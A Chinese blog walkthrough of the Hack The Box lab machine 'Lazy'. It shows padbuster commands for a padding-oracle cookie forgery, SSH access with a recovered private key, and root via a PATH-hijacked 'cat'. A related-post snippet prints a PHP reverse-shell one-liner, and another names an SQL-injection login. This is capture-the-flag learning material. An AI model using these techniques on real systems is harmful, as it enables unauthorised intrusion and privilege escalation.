Hack the box靶机 Lazy

最新推荐文章于 2022-03-24 22:20:02 发布
最新推荐文章于 2022-03-24 22:20:02 发布
阅读量698 收藏
点赞数
分类专栏: Hack the box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38005854/article/details/108742869
版权

在这里插入图片描述
在这里插入图片描述

提示先创建一个账号

在这里插入图片描述

注册后登录
没啥用啊
抓包看看

在这里插入图片描述

将Auth cookie 的值更改为lienzhen
收到错误消息
容易受到Oracle Padding Attack的攻击。
Padding Oracle Attack

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

padbuster http://10.10.10.18/login.php XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf 8 -cookies auth=XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf -encoding 0
padbuster http://10.10.10.18/login.php XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf 8 -cookies auth=XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf -encoding 0  -plaintext user=admin

反向推出admin的值用来登录

在这里插入图片描述
在这里插入图片描述

数值要修改两次
得到一个id_rsa

在这里插入图片描述
在这里插入图片描述

ssh登录成功
看到文件夹下有backup文件

在这里插入图片描述
在这里插入图片描述

脚本调用了cat命令
在/tmp中写一个cat
加入环境变量中
运行
拿到权限

菜浪马废
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HackTheBox靶机系列之困难Reel
04-09
主要介绍Reel靶机得整个利用过程
hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )
冬萍子癸水
05-24 494
1 扫描 常规,22想到可能有ssh登录,80进web搜集信息 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA) | 2048 af:a0:0f:26:cd:1a:b5:1f
No.100-HackTheBox-Linux-Lazy-Walkthrough渗透学习
qq_34801745的博客
05-15 296
** HackTheBox-Linux-Lazy-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/18 靶机难度:中级(4.8/10) 靶机发布日期:2017年10月5日 靶机描述: Lazy mainly focuses on the use of padding oracle attacks, however there are several unintended workarounds that are rela
Hack the box靶机 Arctic
菜浪马废的博客
06-03 361
找到后台登录地址 coldfusion 8 搜索漏洞 找到可以上传的地方 需要payload 使用MS10-059 https://github.com/Re4son/Chimichurri 完成
10种最流行的国外博客程序
zsy799689372的博客
09-23 5384
所以很多国外博客程序都被广泛使用,比如wordpress,joomla等。这些博客除了本身的程序外,也会提供许多插件。因此如何选择好适合自己的博客程序就很重要。 本文将会例举10款目前最流行的国外博客程序,对比他们之间的优缺点,相信对于你的选择会有帮助 1、WordPress WordPress是最有名和最广泛使用的博客平台。 WordPress 是一个免费的开源项目,在GNU通用公共许可
Hack the box靶机 SecNotes
菜浪马废的博客
06-03 245
注册了一个admin‘ or ‘1’='1的用户 登录发现一个账户 看见bash.lnk 可以查看root.txt 也可以像下面这样 完成 好几天没学习了 因为有点心烦 特别爱的女孩 突然就走了 我知道错了也知道怎么改 可是根本没有机会改了 特别难受 只能学习了 因为我怕我闲下来了 就疯狂的想她 我真害怕我弄丢他 还是丢了 其实闲不闲下来 还是一直在想 真他妈的烦 ...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
Hack the box的Easy难度比较有价值的靶机.rar
hack me please靶机攻略.docx
10-19
hack me please靶机攻略.docx
OWASP靶机、安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
PWN靶机环境 网络安全
05-23
PWN靶机环境
hack the box靶场dancing靶机
zr1213159840的博客
03-16 2032
连接上去,还是老套路,要我们回答几个问题,其实也是做题的提示。 第一个问题:SMB缩写的全称是什么? 答案:Server Message Block 第二个问题:smb使用的端口是什么? 答案:445端口。网上能搜到的是smb存在两个端口,另一个是139端口。139端口是跑在netbios上的,445端口是基于ip的,所以这题应该是445端口 第三个问题:smb是那种通信架构的? 答案:就是问smb是bs的还是cs的,smb协议存在服务端和客户端,所以应该是cs的。client-server mode
Hack the box靶机 nineveh
菜浪马废的博客
05-20 391
添加10.10.10.43 nineveh.htb 到/etc/hosts 扫描网站目录 发现一个登录页面 直接hydra爆破账号 admin:1q2w3e4r5t 继续hydra admin:password123 查看漏洞 没有返回 好像是必须在名称中包含ninevehNotes 可以了现在 nc连接 php -r ‘$sock=fsockopen(“10.10.16.118”,1234);exec("/bin/sh -i <&3 >&3 2&gt.
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 2983
每台都做一做,然后记录在博客里.供自己和大家一起学习.
Hack the box靶机 Lame
菜浪马废的博客
05-06 440
以为FTP会有东西呢 发现啥也没有 找一下samba 有漏洞 我看4.3的评分 可能会难 没想到啊没想到 这么简单 ****要是考试也这么简单就好了
No.190-HackTheBox-windows-Sauna-Walkthrough渗透学习
qq_34801745的博客
08-22 430
** HackTheBox-windows-Sauna-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/229 靶机难度:初级(4.3/10) 靶机发布日期:2020年4月29日 靶机描述: Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation. Possible us
hack the box靶场Vaccine靶机
zr1213159840的博客
03-23 3180
开启,看第一题: 问:除了跑了ssh和http服务,还有什么服务? 回答:ftp,使用nmap扫描,能看到结果 nmap -sV -Pn 10.129.95.174 第二个问题: 问:有一个服务时可以匿名登录的,用户名是什么? 回答:anonymous。下意识猜测是ftp服务可以匿名登录,直接在文件管理中使用ftp登录,看到以下结果,然后可以登录,确信是anonymous 并且其中包含一个backup.zip文件,直接下载下来,肯定和后面的题目相关。 说曹操曹操到,第三问 问:可以下载的文件
No.69-HackTheBox-windows-Mantis-Walkthrough渗透学习
qq_34801745的博客
03-15 392
** HackTheBox-windows-Mantis-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/98 靶机难度:中级(4.7/10) 靶机发布日期:2017年10月19日 靶机描述: Mantis can definitely be one of the more challenging machin...
[Hack The Box] 靶机1 Meow+Paper
Huamang的博客
03-24 1671
前言 久闻HTB平台大名,这里不需要下载镜像自己打了,可以直接在网上开好镜像,连上vpn直接干 这次就算是对这个平台的一个熟悉操作吧 Meow 下载到了open文件,kali连接上 然后测试一下可以ping通了 然后就开nmap跑 nmap -sV 10.129.160.90 开启了23端口,telnet服务,直接连接,root账户 直接拿flag 这个算是白给的 Paper 下面就开始打正式的靶机了 一开始开启靶机ping不通,发现Starting Point和Machines居然不是用的一个
hack the box three
最新发布
07-28
回答: 根据提供的引用内容,我了解到"Hack The Box"是一个在线平台,提供了一系列的虚拟机供用户进行渗透测试和漏洞利用的训练。根据引用\[1\]中的信息,可能涉及到nmap扫描、访问靶机地址、查看/etc/hosts、使用gobuster工具等操作。此外,引用\[2\]提到了一种利用fail2ban进行提权的方法,可以通过该链接了解更多细节。引用\[3\]中提到了读取/etc/passwd文件和尝试读取/home/michael/user.txt文件的尝试。请注意,这些信息仅供参考,具体的操作和步骤可能需要进一步的研究和实践。 #### 引用[.reference_title] - *1* [Hackthebox Three](https://blog.csdn.net/lixiangshidie/article/details/128482447)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Hackthebox Trikc攻略](https://blog.csdn.net/qq_44641654/article/details/127249782)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值